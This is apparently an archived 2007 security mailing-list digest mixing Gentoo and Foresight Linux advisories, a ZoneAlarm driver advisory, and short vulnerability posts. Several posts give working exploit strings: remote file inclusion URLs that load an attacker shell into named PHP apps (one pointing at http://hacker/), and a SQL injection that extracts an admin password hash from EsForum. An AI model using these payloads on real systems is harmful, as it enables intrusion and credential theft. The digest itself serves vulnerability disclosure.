http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7180

Description:
Previous versions of the madwifi package were vulnerable to a number of 
Denial-of-Service issues, at least two of which can be exploited to cause a 
system crash (kernel oops). In addition, previous versions could be made to send 
unencrypted information before authentication finishes when using WPA, an 
information leak.

[ GLSA 200704-19 ] Blender: User-assisted remote execution of arbitrary code

[Raphael Marichez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Blender: User-assisted remote execution of arbitrary code
  Date: April 23, 2007
  Bugs: #168907
ID: 200704-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A vulnerability has been discovered in Blender allowing for
user-assisted arbitrary code execution.

Background
==

Blender is a 3D creation, animation and publishing program.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  media-gfx/blender   < 2.43>= 2.43

Description
===

Stefan Cornelius of Secunia Research discovered an insecure use of the
"eval()" function in kmz_ImportWithMesh.py.

Impact
==

A remote attacker could entice a user to open a specially crafted
Blender file (.kmz or .kml), resulting in the execution of arbitrary
Python code with the privileges of the user running Blender.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Blender users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-gfx/blender-2.43"

References
==

  [ 1 ] CVE-2007-1253
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-19.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpSWCCk6l6KI.pgp
Description: PGP signature

Allfaclassfieds (level2.php dir) remote file inclusion

[asdasd asdsadas]

Allfaclassfieds  (level2.php dir) remote file inclusion

 --
 Bug Found By Dr.RoVeR -->Arab48 Hacker

 Contact: [EMAIL PROTECTED]
 ---

 Script: allfaclassfieds


 Download: http://scriptat.com/download.php?sid=718
 --

 Bug File: level2.php

 Bug code in line 4:
 require("$dir/admin/dp.php");

 --

 Exploit:
 http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]



-- 
___
Get your free email from http://www.hackermail.com

EsForum <= 3.0 SQL Injection Vulnerability

[ilkerkandemir]

---
AYYILDIZ.ORG PreSents...


Script: EsForum v3.0
Script Download: http://www.editeurscripts.com/scripts/dl-esforum-3.html

Contact: ilker Kandemir 

info:
*/ MEFISTO Begins. */

---
Exploit: 

forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/*

---


Tnx:H0tturk,Dr.Max Virus,Gencnesil,CodeR,Ajann
Special Tnx: AYYILDIZ.ORG

Big Blue Guestbook HTML Injection Vulnerabilities

[seko]

Hi friends, 


Big Blue Guestbook software is prone to HTML injection attacks. This issue is 
exposed via the message form field in the 

guestbook entry submission form. 

Exploitation could permit remote attackers to persistently inject hostile HTML 
and script code into guestbook content. This 

could allow for theft of cookie-based authentications or other attacks, such as 
those which misrepresent guestbook content. 

vendor : http://www.ben-barnett.com/guestbook.php
download : http://www.ben-barnett.com/BigBlueGuestbook.zip

Thnx: www.starhack.org // CaRaMeL

WASC-Articles: 'The business case for security frameworks'

[announcements]

The Web Application Security Consortium is proud to present 'The business case 
for security frameworks' by Robert Auger. In this article Robert describes the 
advantages of using input validation frameworks during development to reduce 
risks such as Cross-site Scripting.


This document can be found at http://www.webappsec.org/projects/articles/ .


- articles_at_webappsec.org
http://www.webappsec.org


Are you interested in writing a 'Guest Article' for the WASC? Additional 
information
on article guidelines may be found at http://www.webappsec.org/articles/. 
Inquires
can be sent to articles_at_webappsec.org

"Contributed articles may include industry best practices, technical 
information about
current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR 
MARKETING
GIMMICKS PLEASE. We are only soliciting concrete information from the experts 
on the
front lines of the web application security field."

Join us on IRC: irc.freenode.net #webappsec

Re: WS_FTP Home 2007 NetscapeFTPHandler denial of service

[sapheal]

Hey,

It appears that WS_FTP Professional 2007 is also vulnerable as it takes 
advantage of NetscapeFTPHandler as well.

bibtex mase Remote File Inclusion

[InyeXion]

~~
  bibtex mase Remote File Inclusion
~~
  Affected Software .: bibtex mase beta 2.0
  Download..: 
http://www.cs.kuleuven.ac.be/~raf/bibtex/downloads/bibtex_mase_beta_2.0.tgz
  Risk ..: high 
 
  Found by ..: InyeXion 
 
  Contact ...: InyeXion[at]gmail.com
  Web .: Www.InyeXion.com.ar
   
~~

 Affected Files:

/unavailable.php
/Source.php
/log.php
/latex.php
/indexinfo.php
/index.php
/importinfo.php
/import.php
/examplefile.php
/clearinfo.php
/clear.php
/aboutinfo.php
/about.php

etc.

 Vulnerable Code:

include($bibtexrootrel."/layout/header.inc");
~~
Exploit:
  
http://[target]/unavailable.php?bibtexrootrel=Shell?
http://[target]/source.php?bibtexrootrel=Shell?
http://[target]/log.php?bibtexrootrel=Shell?
http://[target]/latex.php?bibtexrootrel=Shell?
http://[target]/indexinfo.php?bibtexrootrel=Shell?
http://[target]/index.php?bibtexrootrel=Shell?
http://[target]/importinfo.php?bibtexrootrel=Shell?
http://[target]/import.php?bibtexrootrel=Shell?
http://[target]/examplefile.php?bibtexrootrel=Shell?
http://[target]/clearinfo.php?bibtexrootrel=Shell?
http://[target]/clear.php?bibtexrootrel=Shell?
http://[target]/aboutinfo.php?bibtexrootrel=Shell?
http://[target]/about.php?bibtexrootrel=Shell?
~~~

Fixed bug:

if((isset($_REQUEST['bibtexrootrel'])  || isset($_GET['bibtexrootrel']) || 
isset($_POST['bibtexrootrel'])) && !defined("bibtexrootrel")){
die("denied access"); }

~~

Remote file inclusion in Joomla 1.5.0 Beta

[Omid]

Hi,
Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
or `production` sites."
Joomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesnt
have a good security approach. Anyway, there is a remote file inclusion
in Joomla 1.5.0 Beta :

File /libraries/pcl/pcltar.php, Line 74 :
  if (!defined("PCLERROR_LIB"))
  {
include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
  }

POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?

The original advisory (in Persian) is located at :
http://www.hackers.ir/advisories/joomla.html


- Omid

FLEA-2007-0013-1: xine-lib

[Foresight Linux Essential Announcement Service]

Foresight Linux Essential Advisory: 2007-0013-1
Published: 2007-04-23

Rating: Moderate

Updated Versions:

xine-lib=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/1.1.6-1.1-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.1-0.2-2

References:
https://issues.foresightlinux.org/browse/FL-266
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1246

Description:
Previous versions of the xine-lib package were vulnerable to a buffer 
overflow which could be exploited to execute arbitrary code on the target 
machine. This can be exploited by a remote user only in a locally-assisted 
fashion - by enticing the user to open a specially crafted file.

[ GLSA 200704-18 ] Courier-IMAP: Remote execution of arbitrary code

[Raphael Marichez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Courier-IMAP: Remote execution of arbitrary code
  Date: April 22, 2007
  Bugs: #168196
ID: 200704-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A vulnerability has been discovered in Courier-IMAP allowing for remote
code execution with root privileges.

Background
==

Courier-IMAP is an IMAP server which is part of the Courier mail
system. It provides access only to maildirs.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  net-mail/courier-imap < 4.0.6-r2  >= 4.0.6-r2

Description
===

CJ Kucera has discovered that some Courier-IMAP scripts don't properly
handle the XMAILDIR variable, allowing for shell command injection.

Impact
==

A remote attacker could send specially crafted login credentials to a
Courier-IMAP server instance, possibly leading to remote code execution
with root privileges.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Courier-IMAP users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/courier-imap-4.0.6-r2"

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-18.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpBfmuZ8oOap.pgp
Description: PGP signature

File117 Remote File Inclusion

[InyeXion]

~
 File117 Remote File Inclusion
~
  Affected Software .: File117
  Download..: 
http://www.sinato.com/jmuffin/upload/file117.zip
  Risk ..: high 
 
  Found by ..: InyeXion 
 
  Contact ...: InyeXion[at]gmail.com
  Web .: Www.InyeXion.com.ar
   
~

 Affected File: 
   
/html/php/detail.php

 Vulnerable Code:


~
Exploit:
  
http://[target]/html/php/detail.php?relPath=[shell]? 
http://[target]/html/php/detail.php?folder=[shell]? 
~

Fixed bug:

if((isset($_REQUEST['relPath'])  || isset($_GET['relPath']) || 
isset($_POST['relPath'])) && !defined("relPath")){
die("denied access"); }

AND

if((isset($_REQUEST['folder'])  || isset($_GET['folder']) || 
isset($_POST['folder'])) && !defined("folder")){
die("denied access"); }

~

[ GLSA 200704-16 ] Aircrack-ng: Remote execution of arbitrary code

[Raphael Marichez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Aircrack-ng: Remote execution of arbitrary code
  Date: April 22, 2007
  Bugs: #174340
ID: 200704-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Aircrack-ng contains a buffer overflow that could lead to the remote
execution of arbitrary code with root privileges.

Background
==

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can
recover keys once enough data packets have been captured.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  net-wireless/aircrack-ng  < 0.7-r2  >= 0.7-r2

Description
===

Jonathan So reported that the airodump-ng module does not correctly
check the size of 802.11 authentication packets before copying them
into a buffer.

Impact
==

A remote attacker could trigger a stack-based buffer overflow by
sending a specially crafted 802.11 authentication packet to a user
running airodump-ng with the -w (--write) option. This could lead to
the remote execution of arbitrary code with the permissions of the user
running airodump-ng, which is typically the root user.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Aircrack-ng users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-wireless/aircrack-ng-0.7-r2"

References
==

  [ 1 ] CVE-2007-2057
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2057

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpRXWzkabEEn.pgp
Description: PGP signature

claroline <= Multiple Remote File Include Vulnerablitiy

[Mohandko]

# claroline <= Multiple Remote File Include Vulnerablitiy
# D.Script: 
http://www.e-learningone.it/software_free/e-learning/claroline175.zip
# Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit:[Path]/claroline/inc/lib/rootSys=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
#Greetz To: mY Love Dr.hacker BiG seso

lms 1.5.3 Remote File Inclusion

[InyeXion]

~~
  lms 1.5.3 Remote File Inclusion
~~
  Affected Software .: lms 1.5.3 libs
  Download..: http://www.lms.org.pl/download/1.5/
  Risk ..: high 
 
  Found by ..: InyeXion 
 
  Contact ...: InyeXion[at]gmail.com
  Web .: Www.InyeXion.com.ar
   
~~

 Affected File: 
   
/modules/rtmessageadd.php

 Vulnerable Code:

Line 27 include($_LIB_DIR.'/multipart_mime_email.php');
~~
Exploit:
  
http://[target]/modules/rtmessageadd.php?_LIB_DIR=Shell?
~~~

Fixed bug:

Update to last version

~~

[ GLSA 200704-17 ] 3proxy: Buffer overflow

[Raphael Marichez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: 3proxy: Buffer overflow
  Date: April 22, 2007
  Bugs: #174429
ID: 200704-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A vulnerability has been discovered in 3proxy allowing for the remote
execution of arbitrary code.

Background
==

3proxy is a multi-protocol proxy, including HTTP/HTTPS/FTP and SOCKS
support.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  net-proxy/3proxy  < 0.5.3h  >= 0.5.3h

Description
===

The 3proxy development team reported a buffer overflow in the logurl()
function when processing overly long requests.

Impact
==

A remote attacker could send a specially crafted transparent request to
the proxy, resulting in the execution of arbitrary code with privileges
of the user running 3proxy.

Workaround
==

There is no known workaround at this time.

Resolution
==

All 3proxy users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-proxy/3proxy-0.5.3h"

References
==

  [ 1 ] CVE-2007-2031
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2031

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpcOTFPOTuPS.pgp
Description: PGP signature

PHPMyBibli <= Multiple Remote File Include

[Mohandko]

# PHPMyBibli  <= Multiple Remote File Include Vulnerablitiy
# D.Script: http://phpmybibli.sourceforge.net/PhpMyBibli-nightbuild.tar.gz
# Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit:[Path]/includes/init.inc.php?base_path=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
#Greetz To: mY Love Dr.hacker BiG seso

[Reversemode advisory] CheckPoint Zonelabs - ZoneAlarm SRESCAN driver local privilege escalation

[Reversemode]

  CHECK POINT ZONE LABS  PRODUCTS
 MULTIPLE LOCAL PRIVILEGE ESCALATION VULNERABILITIES

Rubén Santamarta <[EMAIL PROTECTED]>

04.20.2007
Affected products:
 + ZoneAlarm (Srescan.sys  v 5.0.155 and earlier )

Srescan.sys is exposed through the following Dos Device:“\\.\SreScan”.
Restricted accounts ,including guest users,  can access privileged
IOCTLs implemented within the driver affected.
In addition to this potential risk factor, the driver does not validate
user-mode buffers in Type3 , thus leading to local privilege escalation
due to arbitrary Kernel memory overwrite.

DosDevice: \\.\Srescan
Driver:  srescan.sysVersion: 5.0.83.0

- IOCTL 0x2220CF
.text:00013127 mov ecx, [ebp+arg_10]
.text:0001312A cmp dword ptr [ecx], 4  ;
.text:0001312D jnz short loc_1313F
.text:0001312F mov edx, [ebp+FileInformation]
.text:00013132 mov dword ptr [edx], 3h ;  edx
controlled
.text:00013138 xor esi, esi
.text:0001313A mov [ebp+var_1C], esi
.text:0001313D jmp short loc_1315F

- IOCTL 0x22208F
text:00014091 mov ebp, ds:ExAllocatePoolWithTag
.text:00014097 mov esi, 2h
.text:0001409C push31565244h   ; Tag
.text:000140A1 pushesi ; NumberOfBytes
.text:000140A2 push0   ; PoolType
.text:000140A4 callebp ; ExAllocatePoolWithTag
.text:000140A6 mov ebx, eax
.text:000140A8 testebx, ebx
.text:000140AA jz  short loc_140F3
.text:000140AC mov edi, ds:ZwQuerySystemInformation
.text:000140B2
.text:000140B2 loc_140B2:  ; CODE XREF:
sub_14070+81#j
.text:000140B2 lea ecx, [esp+1Ch+ReturnLength]
.text:000140B6 pushecx ; ReturnLength
.text:000140B7 pushesi ;
SystemInformationLength
.text:000140B8 pushebx ; SystemInformation
.text:000140B9 push5   ;
SystemInformationClass
.text:000140BB calledi ; ZwQuerySystemInformation
.text:000140BD cmp eax, 0C023h
.text:000140C2 mov [esp+1Ch+var_4], eax
.text:000140C6 jz  short loc_140D6
.text:000140C8 cmp eax, 8005h
.text:000140CD jz  short loc_140D6
.text:000140CF cmp eax, 0C004h
.text:000140D4 jnz short loc_14102
.text:0001411D loc_1411D:  ; CODE XREF:
sub_14070+112#j
.text:0001411D mov eax, [edx+44h]
.text:00014120 testeax, eax
.text:00014122 jz  short loc_1417A
[...]
.text:00014154 mov dword ptr [eax+4], 0
.text:0001415B mov esi, [edx+3Ch]
.text:0001415E lea edi, [eax+0Ch]; edi =
OutputBuffer. Controlled
.text:00014161 mov eax, ecx 
.text:00014163 shr ecx, 2
.text:00014166 rep movsd
.text:00014168 mov ecx, eax
.text:0001416A mov eax, [esp+1Ch+var_8]
.text:0001416E and ecx, 3
.text:00014171 inc eax
.text:00014172 rep movsb
.text:00014174 mov [esp+1Ch+var_8], eax
.text:00014178 mov edi, eax


Exploits
No exploits are released. Ethical security companies can contact for
requesting samples :
contact (at) reversemode (dot) com [email concealed]

References:
www.zonelabs.com
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=517
http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=48
(PDF)

---

Reversemode
Advanced Reverse Engineering Services
www.reversemode.com